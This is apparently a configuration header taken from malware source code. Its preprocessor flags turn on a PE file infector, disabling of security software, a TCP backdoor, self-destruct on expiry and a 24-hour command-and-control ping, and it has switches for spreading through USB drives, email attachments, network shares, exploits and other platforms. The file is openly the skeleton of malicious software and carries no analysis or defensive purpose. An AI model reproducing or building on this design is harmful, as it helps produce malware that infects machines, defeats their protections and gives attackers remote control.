
/* MAIN FUNCTION */
#define TERMINATE_PROCESS FALSE
#define EXPIRED_DATE TRUE
#define SELF_DESTRUCT_ON_EXPIRED TRUE
#define TRANSFER_PROCESS TRUE
#define PE_INFECTOR TRUE
#define DISABLE_SECURITY TRUE
#define ENABLE_TCP_BACKDOOR TRUE

/* SPREADING METHOD */
#define USB_STORAGE FALSE
#define EMAIL_ATTACHMENT FALSE
#define NETWORK_SHARES FALSE
#define EXPLOIT FALSE

/* CROSS PLATFORM SPREAD */
#define X_LINUX FALSE
#define X_MAC FALSE
#define X_ANDROID FALSE
#define X_IOS FALSE

/* COMMAND AND CONTROL */
#define C2_PING 24 /* hours */
